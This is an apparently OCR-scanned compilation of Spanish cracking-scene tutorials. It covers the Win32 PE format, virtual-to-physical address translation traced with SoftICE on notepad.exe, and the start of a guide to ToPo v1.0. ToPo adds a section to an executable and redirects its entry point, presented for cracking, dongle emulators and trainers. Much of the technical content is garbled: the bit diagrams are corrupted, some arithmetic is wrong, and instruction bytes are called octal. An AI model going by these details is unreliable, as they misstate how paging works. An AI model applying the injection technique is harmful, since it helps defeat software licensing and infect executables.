Si yo estoy creando el programa puedo controlar el valor de "size of image" variando "SectionAlignement" en las 
opciones del enlazador (de TLINK o de LINK), pero esto no es necesario, porque el mismo enlazador determina el valor 
de "SectionAlignement" a partir del tamaño de cada sección. 


Si la mayoría de los ejecutables tienen la misma dirección base 00400000h ¿como pueden proyectarse varios 
ejecutables a la vez? ¿Qué pasa cuando dos ejecutables tienen igual la: direccionbase + puntoentrada? 


Esto se aclara viendo cómo W32 convierte direcciones virtuales en direcciones reales. Es una cuestión crucial en SOs 


multiprocesos. W32 es uno de estos SOs, también UNIX y LINUX. Para no enredar mucho las cosas, se puede decir que 
W32 crea en memoria física una tabla para cada proceso en ejecución. Esta tabla contiene direcciones de entradas de otra 
tabla que son punteros hacia las direcciones en memoria real donde se encuentran las instrucciones o los datos cargados 
en la RAM. La dirección física de la primera entrada de la tabla que transforma direcciones virtuales en reales está en un 
registro del CPU llamado CR3 (CONTROL REGISTER 3). Para cualquier aplicación puedes obtener el valor en este 
registro empleando SICE simplemente con el comando CPU, el cual muestra el valor en los diferentes registros del CPU. 
Hay que tener en cuenta que el valor de CR3 es sólo la dirección física de la primera entrada de una tabla de punteros a 
direcciones físicas de otra tabla. Se requiere todavía tener el número de la entrada de esta primera tabla para saber donde 
está en la memoria física la segunda tabla. 


Fíjate que casi todas las direcciones virtuales de una aplicación comienzan con 0040XXXXh. No voy a explicarlo, pero 
esto indica la primera entrada de la tabla apuntada por CR3. Lo cierto es que cada tabla primaria es también una página 
de 4096 bytes, dividida en 1024 entradas de 32 bytes que son punteros a la base de otra tabla en memoria física. 


Ahora, ¿por qué un ejecutable en memoria no interrumpe a otro, aunque tengan las mismas bases virtuales? Las posibles 
respuestas a esta pregunta me parece que ya se tienen de alguna manera. La dirección real o física de la página de 
directorio activa se almacena en el registro CR3 del CPU, el cual cambia cada vez que W32 conmuta el control entre 
procesos. Para cada proceso, el sistema crea un directorio de página particular. Para procesos distintos no deben coincidir 
los directorios de página, de lo contrario se producirá un error de protección, como a veces ocurre. 


¿Qué utilidad tiene dividir los ejecutables en secciones? 


Para facilitar la ubicación de los datos. Además porque, como expliqué, cada sección tiene diferente función y diferentes 
atributos. Imagina el enrredo si el enlazador al crear el programa pusiera el código junto a los datos, mezclados con los 
recursos y otras cosas: uff! Esto es así siempre, incluso en DOS. Lo que pasa es que en DOS se segmenta la memoria; 
W32 la pagina. También podemos encontrar otras razones que exigirían el manejo de conceptos que finalmente terminan 
enrredándonos más y haciéndonos parecer que se trata de una cosa muy compleja. Se trata de explicaciones que podemos 
encontrar en libros sobre arquitectura de computadoras. Hay varios en español, posiblemente en alguna biblioteca. 


W32 puede manejar 4 Gb ffff:ffffffff que vemos en el sice. FFFFh x FFFFFFFFh = FFFF0001h = 4294901761 
bytes = 4 Gb Lo cual quiere decir que las direcciones que siempre vemos en sice no son de la ram sino de la 
memoria virtual ¿no? 


Muy cierto. Esto creo que cambiará el día que ya no necesitemos memoria virtual. De todos modos, si se tiene suficiente 
cantidad de RAM, en ocasiones podemos prescindir de ella. Yo nunca he probado, pero me han comentado que es más 
rápido. 


Las paginas de memoria parecen importantes ¿qué son? ¿Qué relación tienen con las direcciones que vemos en 
SICE? 


W32 divide la memoria física en "páginas" que tiene una longitud de 4096 bytes (4 KB). Una máquina con 8 MB de 
memoria tiene 2048 páginas. W32 mantiene una colección de tablas de página (también de 4 KB) para traducir 
direcciones virtuales a direcciones físicas. Cada proceso tiene su propia "página de directorio": una colección de hasta 
1024 entradas de 32 bits almacenadas contiguamente. La dirección real o física de la página de directorio activa se 
almacena en el registro CR3 del CPU, el cual cambia cada vez que W32 conmuta el control entre procesos. Por eso, las 
direcciones virtuales iguales entre dos procesos diferentes no apuntan a la misma dirección física, a no ser que refieran a 
espacios de memoria compartidos. 


Las direcciones que despliega SICE son virtuales y a partir de ellas se puede determinar la dirección de memoria física 
donde están los datos o instrucciones correspondientes. Para ello se puede emplear el comando PHYS, que busca la tabla 
de páginas y el Directorio de páginas asociado con el contexto de direcciones actual desplegado por SICE. Es decir, 
PHYS despliega todas las direcciones virtuales para direcciones físicas. Puede emplearse PEEK para leer desde la 
memoria física, ya que muestra el byte, word, o dword en una dirección física dada. PEEK es útil para leer registros de 
entrada o salida proyectados en memoria. También es útil el comando PAGE, el cual permite ver la proyección de todo el 
rango de direcciones lineales. Esto permite obtener la dirección física del directorio de página y verificar si las tablas de 
páginas del sistema operativo están proyectadas en la dirección lineal 0xC0000000. Véase La Memoria en W32: intro. 


¿Por qué necesitamos alineamientos? ¿ Por qué FileAligment usualmente usa límites en 512 bytes y 
SectionAlignment (después de que la imagen fue cargada en RAM) usualmente usa límites de 4096 bytes? 


W32 trata con paginación de memoria física y usa memoria virtual. Entonces W32 tiene que manejar memoria virtual y 
debe tener una manera rápida de encontrar los datos del archivo. Estas son las razones de la existencia del encabezado 


PE. 


W32 pagina la memoria física, la divide en regiones de tamaño fijo. En la arquitectura x86 cada página tiene un tamaño 
de 4096 bytes. Cualquier sección cargada en RAM debe tener un alineamiento para soportar paginación de memoria. 
Cuando el sistema reserva memoria, asegura que la región reservada sea un múltiplo par del tamaño de página. 
SectionAlignment garantiza que cada sección comience en una dirección virtual alineada a una página 


File Alignment es un valor que debe ser potencia de 2 entre 512 y 65,535. Es "la granularidad mínima de pedazos 
(chunks) de información dentro de la imagen antes de ser cargada" [Katz]. En el archivo PE, los datos brutos que 
comprenden cada sección deben comenzar en un múltiplo de FileAlignment. El valor por defecto es 512 bytes, 
probablemente para asegurar que las secciones siempre inicien en el comienzo de un sector del disco (el cual también 
tiene un tamaño de 512). 


¿Qué es un proceso? 


W32 llama proceso a un programa en ejecución. Un proceso posee un espacio de 4 GB con los datos y el código del 
archivo EXE de la aplicación. Un proceso es inerte, no hace nada. Para que haga algo debe poseer un hilo, el cual se 
responsabiliza de ejecutar el código presente en el espacio de direcciones del proceso. Incluso, un proceso puede tener 
más de un hilo en el mismo espacio de direcciones ejecutándose al mismo tiempo. Pero el proceso necesita por lo menos 
un hilo para ejecutar el código proyectado en su espacio de direcciones, en caso contrario el sistema destruye el proceso 
y su espacio de direcciones. 


¿Qué es un hilo (thread)? 


Es la descripción de la trayectoria que sigue la ejecución de un proceso. Cuando arranca un proceso, el sistema crea un 
hilo principal (llamando a CreateThread) el cual comienza llamando a la función WinMain, ejecutándola hasta alcanzar 
la función ExitProcess que culmina el proceso. La noción de hilo fue implementada por W32 para dar cuenta de la 
posiblidad de los procesos W32 de correr más de un subproceso al mismo tiempo. W32 llama hilos a los subprocesos. 


Bueno. Lo visto hasta ahora puede servir como una introducción al conocimiento de los archivos con formato PE y para 
adquirir cierta conciencia de la importancia de este asunto. Realmente deberíamos profundizar más. 


Como vieron he escogido como víctima a SNIPPETCREATOR. No es casual. Se trata de un programa muy poderoso, 
pero que requiere conocimiento de programación en ASM W32 y conocer el formato PE. Si tienes a la mano MASM 6.X 
o TASM 5.X, entonces podemos avanzar ya al estudio de SNIPPETCREATOR, lo cual nos dará mayor conocimiento 
sobre los archivos PE: 


snippetcreator: tutorial (en elaboración) 


Si no tienes conocimiento del lenguaje ensamblador para W32, pero todavía te interesa el tema de los PE, entonces 
pasemos a estudiar la sección de recursos de estos archivos. 
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La Memoria en W32: intro 
Introducción 


La gestión de memoria en W32 se realiza a través de tres mecanismos: 


1- memoria virtual: cuando se quiere gestionar grandes estructuras de objetos. 

2- proyección de archivos en memoria: para gestionar grandes paquetes de datos en los archivos 
y compartir datos entre procesos distintos. 

3- montículos (heaps): para gestionar muchos bloques pequeños de datos. 


El tema está suficientemente desarrollado en tres artículos clásicos de Randy Katz: 


1- Managing Virtual Memory in Win32 
2- Managing Memory-Mapped Files in Win32 
3- Managing Heap Memory in Win32 


En este artículo me limitaré a explicar un poco la gestión de la memoria virtual en W32, concetrándome en la 
manera cómo W32 traduce direcciones virtuales a direcciones reales. Se trata de una adpatación de la sección 
"Finalmente, 32 bits" del capítulo "Gestión de memoria y entrada/salida de archivos" del libro Programación en 
Windows 95 de Charles Petzold. 


Al Atake 


¿QUÉ ES MEMORIA VIRTUAL? 


A medida que los programas de aplicación se han hecho más sofisticados y más grandes, se ha necesitado de 
ampliar las posibilidades de la memoria dinámica de los sistemas. Debido a lo poco económico que resulta atender 
la gran exigencia de memoria simplemente implementando ships con elevada capacidad de almacenamiento, este 
problema se ha abordado vía software, a través de sistemas operativos que ofrecen gestión de memoria virtual. 


Es un mecanismo de gestión de la memoria de un sistema que implementa un espacio de memoria ficticio, llamado 
espacio de direcciones o de nombres, el cual es mucho mayor que el espacio de memoria real física que posee el 
hardware del sistema. De esta manera, el programador al desarrollar aplicaciones para un SO con memoria virtual, 
no tiene que ocuparse de la memoria física, simplemente programa como si tuviera a su disposición una gran 
espacio de direcciones para cada proceso. 


¿CÓMO ES POSIBLE LA GESTIÓN DE MEMORIA VIRTUAL? 


El programador desarrolla sobre un gran espacio de memoria virtual, compila o ensambla sus fuentes para producir 
los ejecutables de sus aplicaciones. Es todo lo que hace. El SO se encarga de lo demás: traduce las direcciones 
virtuales en direcciones físicas y carga en la RAM del sistema sólo aquellos bloques de la aplicación que necesi ta, 
nunca carga todo el ejecutable ya que éste seguramente ocuparía todo el espacio de memoria física disponible y el 
sistema colapsaría. 


¿CÓMO TRADUCE W32 DIRECCIONES VIRTUALES A REALES? 


W32 requiere la presencia de un microprocesador Intel 386, 486 o Pentium. Estos procesadores usan 
direccionamiento de memoria de 32 bits y por tanto son capaces de acceder 2 elevado a la 32, es decir, 
4.294.967.296 bytes (4 gigabytes o GB) de memoria física. Por supuesto, la mayoría de los usuarios de W32 no 
están cerca de ese límite. 


Las direcciones de 32 bits usadas por los programas W32 para acceder al código y los datos no son las direcciones 
físicas de 32 bits que el microprocesador usa para direccionar la memoria física. La dirección que utiliza la 
aplicación se llama dirección «virtual» la cual es una dirección ficticia que se traduce a una dirección física a través 
de una «tabla de página». 


Para leer una instrucción o dato en la RAM, el CPU necesita colocar en el BUS de direcciones esa dirección donde 
debe estar ubicada la dirección o dato solicitado. Por ejemplo, si quiere acceder a la memoria de video, que está en 
0A0000h, el CPU debe colocar este valor en el BUS. 


Como las direciones de las aplicaciones son direcciones virtuales, el CPU debe traducirlas a direcciones físicas 
antes de acceder a los datos en la RAM. 


Las aplicaciones suelen ignorar este proceso. El programa parece almacenarse en un espacio de direcciones de 32 
bits y no hay nada extraño cuando se tiene que acceder a esta memoria. Sin embargo, es conveniente hacerse una 
idea de lo que significa esto. 


W32 pagina la memoria física, la divide en «páginas» con una longitud de 4096 bytes (4 KB). Una máquina 
equipada con 8 megabytes de memoria tiene 2048 páginas. W95/98 mantiene una colección de tablas de página 
(ellas mismas páginas 4 KB) para traducir direcciones virtuales a direcciones físicas. 


Cualquier proceso en W32 tiene su propia «página de directorio», que es una colección de hasta 1024 entradas de 
32 bits almacenadas contiguamente, una después de otra. La dirección física de la página de directorio activa se 
almacena en un registro del microprocesador llamado CR3 (CONTROL REGISTER 3), que se cambia cuando el 
SO conmuta el control entre procesos. Los 10 bits altos de una dirección virtual especifican una de las 1024 
entradas posibles en esta página de directorio. Los 20 bits altos de la entrada de la página de directorio indica una 
dirección física de una tabla de página (los 12 bits inferiores de la dirección física se definen a cero). Esto 
referencia otra página, que también tiene hasta 1024 entradas de 32 bits. Los 10 bits del medio de la dirección 
virtual referencian una de estas entradas. De nuevo, la entrada tiene una dirección física de 20 bits para indicar la 
posición de comienzo de un marco de página, que es una dirección física. Los 12 bits inferiores de una dirección 
virtual apuntan a una posición física dentro de este marco de página. 


Mostrado simbólicamente, uno puede representar una dirección virtual de 32 bits (que es con lo que trabaja una 
aplicación) como una entrada de página de directorio de 10 bits (d), una entrada de tabla de página de 10 bits (p) y 
un offset de 12 bits: 


dddd-dddd-ddpp-pppp-pppp-0000-0000-0000 


Para cada proceso, el microprocesador almacena un valor de 20 bits en el registro CR3 (1 de registro): 


TErC-CECE-PErr-Errr-rrrr 


La dirección física de comienzo de la página de directorio activa del proceso es: 


rrrr-rrrr-rrrr-rrrr-rrrr- 0000-0000-0000 


Recuérdese que todas las páginas se almacenan en límites de 4 KB, por tanto, cada página comienza en una 
dirección con los 12 bits inferiores igual a cero. El microprocesador primero accede a la dirección física: 


rrrr-rrrr-rrrr-rrrr-rrrr-dddd-dddd-dd00 


Esta posición contiene otro valor de 20 bits (t de tabla): 


tttt-tttt-tttt-tttt-cttt 


lo cual indica la dirección física de comienzo de una tabla de página: 


tttt-tttt-tert-tett-tttt-0000-0000-0000 


El microprocesador accede luego a una dirección física: 


tttt-tttt-tttt-tttt-tttt-pppp-pppp-pp00 


Almacenado en este área hay un valor de 20 bits de un marco de página (c de marco): 


CCCC-ECCC-CCCC-ECCC-ECCCC 


La dirección fisíca final de 32 bits es una combinación de este marco de página con los 12 bits de offset inferiores 
de la dirección virtual: 


CCCC-ECCC-EcCCeCe-ECCce-ecCCcc-0000-0000-0000 


Esta es la dirección física. Es todo. 


Puede parecer que traducir una dirección virtual en dirección física es un proceso que lleva mucho tiempo, pero 
realmente no es así. Los microprocesadores Intel 386, 486 y Pentium tienen una memoria cache interna que puede 
guardar estas tablas de página dentro del microprocesador. La traducción se realiza de forma muy rápida sin 
ninguna penalización de tiempo. Esta doble paginación (páginas que se guardan en una página) ofrece a cada 
aplicación un límite teórico de aproximadamente un millón de páginas de 4 KB. 


EMPLEANDO SICE 


Podemos revisar el proceso de traducción de memoria virtual a memoria física con SICE. 


Carguemos notepad.exe con el loader de SICE. Cuando se despliega la pantalla de SICE, el depurador está 
apuntando a la primera instrucción del programa cuya dirección virtual es 00401000h. A partir de esta dirección 
podemos calcular la dirección física donde se ubica esta instrucción en la RAM. 


Traduzcamos el valor hexadecimal de la dirección virtual a binario: 


0000 0000 0100 0000 0001 0000 0000 0000 


Tenemos: 
1. Entrada del directorio de páginas o primario, diez bytes altos: 


0000 0000 01 = 1 
Es la entrada 1 del directorio primario 


2. Entrada de la tabla de páinas o directorio secundario, diez bytes medios: 


00 0000 0001 = 1 
Es la entrada 1 del directorio secundario 


3. Desplazamiento en el marco de página de memoria física, doce bytes bajos restantes: 


0000 0000 0000 = 0 


Comienzo del marco de página o desplazamiento cero. Recuérdese que es la primera instrucción del programa. 
Para determinar exactamente la dirección física de la dirección debemos: 


1. obtener la dirección física donde está el directorio de páginas activas o directorio primario. Este valor está en 
CR3 y lo obtenemos con el comando 'CPU' de SICE. Cada entrada de este directorio es un puntero al directorio 
secundario. 


2. obtener la dirección de la entrada en el directorio primario donde se encuentra la dirección del comienzo del 
directorio secundario. Sabemos la dirección del inicio del directorio primario por los 20 bits altos del contenido de 
CR3. La entrada dentro del directorio primario que dice donde está la tabla que interesa está indicada por los diez 
bits altos de la dirección virtual. Como cada entrada del directorio primario es de 32 bits = 4 bytes, hay que 
multiplicar el número de entrada por 4 para obtener la dirección de la entrada correspondiente en el directorio 
primario. 


3. obtener la dirección física dónde se encuentra la tabla de páginas o directorio secundario. Con la dirección de la 
entrada del directorio de página donde está la dirección de la tabla de páginas activas, se puede emplear el comando 
PEEK de SICE para obtener esta última dirección: 


PEEK D DIRECCIÓN_DE_ENTRADA_DE_DIRECTORIO_PRIMARIO 


4. obtener la dirección de la entrada en la tabla de páginas donde está la dirección del inicio o marco de la página 
donde está la instrucción apuntada por la dirección virtual. Sabemos la dirección del inicio del directorio secundario 
por los 20 bits altos del contenido la entrada del directorio primario. La entrada dentro del directorio primario que 
dice donde está el mmraco de página que buscamos está indicada por los diez bits medios de la dirección virtual. 
Como cada entrada del directorio secundario es de 32 bits=4 bytes, hay que multiplicar el número de entrada por 4 
para obtener la dirección de la entrada correspondiente en el directorio secundario. 


5. obtener la dirección física dónde se encuentra el marco de página donde se ubica la instrucción señalada por la 
dirección virtual. Con la dirección de la entrada del directorio secundario donde está la dirección del marco de 
páginas, se puede emplear el comando PEEK de SICE para obtener esta última dirección, ya que este comando 
devuelve el contenido de una dirección física: 


PEEK D DIRECCIÓN _DE_ENTRADA_DE_DIRECTORIO_SECUNDARIO 


6. obtener la dirección física de la instrucción en la página específica. Este valor se obtiene a partir de los 20 bits 
altos del contenido en la entrada correspondiente en el directorio secundario y los 12 bits bajos en la dirección 
virtual. Estos bits bajos de la dirección virtual son un desplazamiento dentro del marco de página donde se ubicó el 
contenido de la aplicación. 


7. obtener el contenido en la dirección física señalada por el desplazamiento dentro del marco de página donde se 
encuentra el código o los datos indicados por la dirección virtual. Finalmente el comando 


PEEK D DESPLAZAMIENTO_EN_MARCO_DE_PÁGINA 


devuelve, invertida, la instrucción en octal en la dirección virtual. Para comprobar esto, si el puntero de SICE 
apunta a esta dirección virtual el comando 


D EIP 


devuelve el mismo valor en la ventana de datos de SICE. También podemos verificar esto revisando el código en 
octal de la instrucción correspondiente. Debemos ver lo mismo pero invertido. El comando 


CODE ON 
lo mostrará. 
Contiínuemos con notepad.exe. 
Ya tenemos los valores que corresponden a la dirección virtual de la primera instrucción de notepad.exe 


La dirección física de la página de directorio o directorio primario lo obtenemos con el comando CPU de SICE: 
008170000h. Traduzcámoslo a binario: 


0000 0000 1000 0001 0111 0000 0000 0000 


Los primeros 20 bits de este número indican la dirección física del comienzo del directorio primario del proceso 
activo. Los diez bits altos de la dirección virtual nos dicen que se trata de la primera entrada en este directorio 


0000 0000 1000 0001 0111 - 0000 0000 01 - 00 


A A 


bytes altos en CR3 - — bytes altos 
en dir virtual 


obtenemos una nueva dirección física, la de la entrada 1 de la tabla de pá- 
ginas o directorio secundario: 00817004h. 


Ejecutemos el comando PEEK D 817004. 


PEEK D 00817004 
SICE nos dá: 01EFE267 


Obtenemos ahora la dirección física del directorio secundario. En binario: 


0000 0001 1110 1111 1110 001001100111 


Los doce bits altos de este valor apuntan al inicio del directorio secundario. Los diez bits medios indican una 
entrada dentro de este directorio. 


1100 0001 1011 1011 1111 - 00 0000 0001 - 00 


A A 


bytes altos en 0IEFE267  - bytes medios 
en dir virtual 


En hexadecimal: 01EFF004H 


Esta entrada contiene la dirección del marco de página en memoria física donde se encuentra instrucción indicada 
por la dirección virtual. 


Ahora obtengamos la dirección del marco de página: 


PEEK D 01EFF004 
Obtenemos un valor como 01DEC225h. Traduzcamos este valor a binario: 
0000 0001 1101 1110 1100 0010 0010 1001 


Los 20 bits altos de este valor son la dirección física de un marco de página, es decir, del comienzo de una página 
de memoria física. Si agregamos a este valor el valor indicado por los doce bits bajos de la dirección virtual 
obtenemos la dirección física donde se haya la instrucción señalada por la dirección virtual: 


0000 0001 1101 1110 1100 - 0000 0000 0000 


A A 


bytes altos en 0IDEC225h  - bytes bajos 
en dir virtual 


PEEK D 01DEC0000 


SICE devuelve 83EC8B55 


El valor devuelto por este comando corresponde a la instrucción en octal, pero invertido, a la que apunta la 
dirección virtual. Si esta es la dirección señalada por el puntero de SICE el siguiente comando nos devolverá el 
mismo valor regeresado antes: 


D EIP 


Vemos ahora que la ventana de datos de SICE apunta a 83EC8B535, en la dirección EIP, el mismo valor devuelto 
con el comando 'PEEK D 01DEC0000' 


Hagamos "code on" y veamos la correspondencia entre el valor desplegado por el último PEEK y el código en octal 
desplegado por SICE, que seguramente será el mismo pero invertido 


55 push ebp 
SBCE mov ebp, esp 
83... 


¿QUÉ VENTAJAS TIENE LA PAGINACIÓN? 


Las ventajas de la paginación son: 


Primero, las aplicaciones se aislan unas de otras. Ningún proceso puede inadvertidamente (o maliciosamente) 
escribir encima del espacio de código o datos de otro proceso, pues ni siquiera es capaz de direccionar la memoria 
del otro proceso sin el valor CR3 adecuado, y definir este valor es una tarea que sólo puede hacer el núcleo W32. 


Segundo, este mecanismo de paginación resuelve uno de los problemas más básicos en un entorno multitarea: la 
consolidación de la memoria libre. En un esquema de direccionamiento más simple, a medida que se ejecutan 
múltiples programas y se sale de ellos, la memoria se va fragmentando. Si la memoria está demasiado fragmentada, 
los programas no se pueden ejecutar porque no tienen suficiente memoria contigua, incluso aunque la cantidad total 
de memoria libre sea la adecuada. Con la paginación, no es necesario consolidar la memoria física libre porque las 
páginas no tienen que ser contiguas. Cualquier cosa se gestiona manipulando las tablas de página. La única pérdida 
viene realmente por el espacio perdido en las propias tablas de página y la granularidad de las páginas de 4 KB. 


Tercero, hay bits extra en las entradas de tabla de página de 32 bits además de las direcciones de 20 bits. Un bit 
indica que se ha accedido a una página particular (se denomina bit de «acceso»); otro que la página ha sido escrita 
(el bit «sucio»). W32 puede usar estos bits para determinar si una página de memoria se puede intercambiar 
(swapping) a un archivo de disco para obtener más memoria física libre. Otro bit («presencia») indica si la página 
se ha intercambiado al disco y se tiene que recargar en memoria. 


Otro bit («lectura/escritura») indica si la página se puede escribir. Este bit protege el código de los punteros 
errantes. Por ejemplo, si se incluye la instrucción en código C siguiente en un programa Windows: 


* (int *) WinMain 0; 


se obtendrá un cuadro de mensaje diciendo: «Este programa ha realizado una operación ilegal y se cerrará». Este bit 
no evita que un programa compile el código fuente del programa y almacene las instrucciones de lenguaje 
ensamblador en memoria para ser ejecutadas. 


Las direcciones virtuales tienen un ancho de 32 bits. El código y los datos (estáticos, de pila o localizados) de un 
programa tendrán direcciones entre 0x00000000 y Ox 7FFFFFFF. El propio W32 usa direcciones desde 0x80000000 
a OXFFFFFFFFE y aquí es donde se encontrarán los puntos de entrada a las librerías de enlace dinámico (DLL) de 
W32. 


La cantidad total de memoria libre está determinada por la cantidad de memoria física libre y el área libre de disco 
duro disponible para intercambio de páginas. Como es normal con la gestión de memoria virtual, W325 emplea un 
algoritmo LRU (Least-Recently Used: usado-menos-reciente 

mente) para determinar qué páginas intercambiar a disco. Los bits de «acceso» y «sucio» le ayudan en esta tarea. 
Las páginas de código no tienen que guardarse en disco porque las páginas de código no son escribíbles, 
simplemente se puede recargar desde el archivo .EXE o la librería de enlace dinámico (DLL). 


A veces, se verá que se accede al disco cuando se mueve el ratón desde el área cliente de un programa al área 
cliente de otro programa. ¿Por qué ocurre esto? Windows tiene que enviar mensajes de movimiento de ratón a la 
segunda aplicación. Si el código del programa para procesar este mensaje no está cargado actualmente en memoria, 
Windows tiene que recargarlo desde el archivo de disco. Si tiene varios programas Windows grandes cargados 
simultáneamente y no tiene mucha memoria, probablemente verá una actividad inusual en el disco duro a medida 
que se mueve de programa a programa, pues Windows está recargando páginas descargadas previamente. 


A veces, los programas individuales se ralentizan (o se detienen completamente) cuando Windows está realizando 
el intercambio (conmutación) de páginas. Las páginas de código se pueden compartir entre aplicaciones. 


Esto es particularmente útil para las librerías de enlace dinámico. Varios programas ejecután-dose a la vez pueden 
usar las mismas funciones Windows 93, sin que sea necesario que el mismo código se cargue en memoria varias 
veces. Sólo es necesario una copia del código. 


Excepto la granularidad de las páginas de 4 KB, la memoria física no se puede fragmentar porque la 
desfragmentación implica únicamente manipular las tablas de página. Sin embargo, la memoria virtual de una 
aplicación se puede fragmentar si una aplicación localiza, relocaliza y libera varios bloques de memoria. El limite 
de 2 MB para el código y los datos de una aplicación normalmente es suficiente para evitar problemas. Es mucho 
más fácil que un programa se quede antes sin memoria física que llegue a encontrar un límite en la memoria virtual. 
Pero puede ocurrir, y si tiene un programa donde este problema es concebible, puede que desee considerar la 
memoria «movible». 


¿EL PROGRAMADOR PUEDE GESTIONAR LA MEMORIA VIRTUAL? 


Sí, por supuesto. Para ello W32 proporciona varias funciones API: 


Esta función se emplea para reservar y comprometer espacio de memoria virtual: 


LPVOID VirtualAlloc (LPVOID IpAddress, DWORD cbsSize, 
DWORD fdwAllocationType, DWORD fdwProtec); 


Para liberar el espacio de memoria comprometido: 


BOOL VirtualFree (LPVOID IpAddress,SWORD cbSize,DWORD fdwFreeType); 


Bueno. Espero que este breve escrito sobre la gestión de memoria virtual en W32 pueda entenderse y sea de 
utilidad. 


Cualquier error u observación, por favor notifíquenme: 
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Introducción 


Los esquemas de protección de software pueden dividirse en dos grandes grupos. 
Los que se apoyan en dispositivos de hardware y los que lo hacen exclusivamente en 
el software. 

Los metodos soft pueden a su vez dividirse en aquellos en los que la limitación de la 
versión es condicional (Serial, fecha limite, numero de usos) y en los que es 
incondicional (opciones físicamente eliminadas del codigo) 


Salvo la elegante alternativa de los KeyMakers y los RegPatches, el resto de las 
desprotecciones exige que se realicen CAMBIOS en ficheros binarios, ya sean datos 
o instrucciones de codigo. 


Una regla de oro del crackista (que palabro!) consiste en que la modificación 
binaria propuesta debe PARCHEAR los contenidos existentes SIN AÑADIR un sólo 
byte. 

Bueno... en la inmensa mayoría de los casos esto no resulta un problema puesto que 
lo que se pretende es cambiar es: 


e el valor de un flag 
e una condición de bifurcacion 
e la ocurrencia de un CALL 


No sólo NO es un problema sino que además establece el alcance del RETO: 
"...sólo modificar en el fichero los bytes existentes y además en mínimo número...” 


Sin embargo, hay un "paquete" de situaciones en las que esta restricción se hace un 
tanto insoportable y que podría responder a la siguiente clasificación: 


e Empaquetados/Encriptados: el código NO está accesible en el fichero. 

e Reconstrucción de código no presente. 

e Emuladores de llave de hardware. 

e Adición de NUEVOS elementos a un programa sin tener el código fuente. 


Qué tienen en común estos casos? pues se me ocurren dos cosas: 


e Necesidad de un área "espaciosa" para escribir nuestro código añadido. 
e Necesidad de convivir en el mismo espacio de memoria del programa. 


Puede verse que esto trata de INGENIERÍA INVERSA en el aspecto más amplio y 
no sólo en lo que respecta al cracking. 
Pero cómo se consigue expandir el área de código de un programa en una forma 


segura y estable...? La respuesta tiene nombre de bicho: ToPo v1.0. 


> y 
nl 
ToPo: Arreglando el cuarto de invitados 


ToPo v1.0 es una utilidad que permite añadir a un ejecutable (o DLL) una extensión 
vacía para ser rellenada con código fresco. Podemos añadir típicamente una decena 
de estas "extensiones ortopédicas" dependiendo de la estructura interna del fichero. 
Entonces podremos hexeditar y añadir nuevas rutinas, parchear el código en 
memoria, reconstruir código incompleto, diseñar emuladores de dongle, trainers para 
juegos...y todo ello sin limitación de espacio! (- 10 Mb) 


El principio en que se basa la herramienta es muy simple. La estructura del formato 
PE (ejecutables y librerías Win32) consiste en una colección de cabeceras con 
multitud de datos (muchos no usados para nada). 


Entre las cabeceras más importantes están las llamadas cabeceras de sección. Son 
paquetes de 40 bytes donde se definen las características de los bloques de datos del 
programa (código, constantes, iconos, punteros, etc). 


La zona en que habitan estas cabeceras suele disponer de espacio libre para añadir 


del orden de 10 nuevas y nada impide que un programa tenga mas de una seccion de 
código (como ejemplo sirvan los empaquetadores en los que la rutina de 
desempaquetado suele alojarse en una sección propia). 


Así las cosas podemos DECLARAR una nueva sección del tamaño que nos 
apetezca y AÑADIRLA al final del fichero sin ningún tipo de problemas. El nuevo 
invitado tendrá un "segmento" de direcciones a las que (y desde las cuales) se podrá 
acceder al resto de la imagen del fichero en memoria. 


Reinventando los virus, MrCrimson? bueno cada cual es libre de inocular lo que le 
parezca... personalmente prefiero darle aplicaciones constructivas como el 
CrAcKiNg! 


VW 
ToPo: Bichos en el jardín 
t:* ToPo by MrCrimson¿[W'kT199] E 


Select file... 


je: ATempiMyFile.exe 


[Y Backup file 


Bytes to be added: I 00 FT Redirect Entrypoint 
TT” Make code writable 


Result: — 
100 bytes added at: Doll 


-memory address: D0409000h Help 


+ile offset: 00001400h Exi 
Exit 


Este es el cuadro de diálogo de la herramienta perforadora. El usuario solo tiene que 
seleccionar su fichero víctima (32 bits only, plz) e indicar cuantos bytes necesita 
para escribir su código. El click en "Do It!" informa acerca del éxito del resultado y 
de donde puede localizarse el nuevo inquilino (tanto en memoria como en fichero). 


Las opciones permiten: 


e Backup file: saludable copia de seguridad antes de inyectar el alien. 

e Redirect Entrypoint: Hace que el programa COMIENCE su ejecución en 
la nueva sección (".topo") al final de la cual se vuelve al inicio natural del 
programa. Esto nos permite realizar los cambios que sean necesarios en el 
código mapeado en memoria. 

e Make code writable: Permite que podamos escribir tranquilamente en el 


código principal. Necesario si vamos a parchear. 


Y con esto está todo dicho. Vamos a ver que se puede hacer en la práctica. 


VI 
Ejemplo (1): Adición de código nuevo 


Como víctima utilizaremos un programa del que todos disponemos: el bloc de notas 
(ejecutable: "notepad.exe" alojado en "Wwindows”). 

Vamos a añadir un trozo de código de 100 bytes con una llamada API. Para ello haz 
una copia en otro directorio y arranca ToPo v1.0: 


e selecciona: notepad.exe 
e tamaño a añadir: 100 bytes 


Seleccionar opciones: 


e Backup 
e Redirect entrypoint 


Una vez hecho se nos informa de que la nueva sección estará disponible en el offset 
de fichero x8A00h y si trazamos con Winice lo encontraremos a partir de la 
dirección :40C000. 

La opción "redirect entrypoint" ha cambiado el EntryPoint original :401000 (inicio 
de la sección ".code") por :40C000 (inicio de la sección ".topo"). Además, al final 
del bloque ha insertado un JMP 401000 de forma que despues de nuestros arreglos 
regresamos automaticamente a la ejecución natural del programa. 


Vamos a hacer que el NOTEPAD genere una especie de splash precaria esperando 
confirmación antes de arrancar. Todos conoceis ya la sintaxis de la función 
MessageBox: 


push Estilo 

push Titulo_ventana 

push Mensaje 

push Handle_ventana_Padre 
Call MessageBox 


Como estilo elegimos el más simple: un simple botón "OK" (valor 0) 
Como título pondré: "MrCrimson dice:" 

Como mensaje: "Tomando el control desde el principio" 

Nuestra ventana no tendra padre (sob!) con lo que el handle sera cero. 


Ahora, la forma más fácil de proceder consiste en arrancar Winice y con el comando 
AN 


comenzar a escribir el código en nuestra parcela. Cómo definimos las strings...? muy 
fácilmente: 


-Escribimos todas nuestras constantes y variables a partir del 3er byte. 
-Reservamos los dos(**) primeros bytes para un JMP que salte por encima de estas 
declaraciones. 


(*) el número exacto dependerá del tamaño de los datos). 
Por ejemplo: 


:40C000 ¡mp 40C005 
:40C002 686F6C6100 <---- "hola" (00 terminador de strings) 
:40C005 continua el codigo 


el offset :40C002 contiene la cadena "hola" y podemos usarlo como argumento en 
nuestras llamadas a función. De esta misma forma se definen variables y constantes 
